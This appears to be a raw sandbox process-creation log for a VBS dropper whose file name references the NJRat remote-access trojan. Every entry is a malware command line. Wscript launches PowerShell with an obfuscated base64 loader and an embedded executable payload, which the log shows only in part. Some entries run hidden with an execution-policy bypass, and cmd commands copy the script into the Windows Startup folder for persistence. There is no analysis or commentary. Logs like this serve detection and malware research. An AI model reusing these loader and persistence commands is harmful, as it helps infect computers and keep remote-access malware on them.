Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
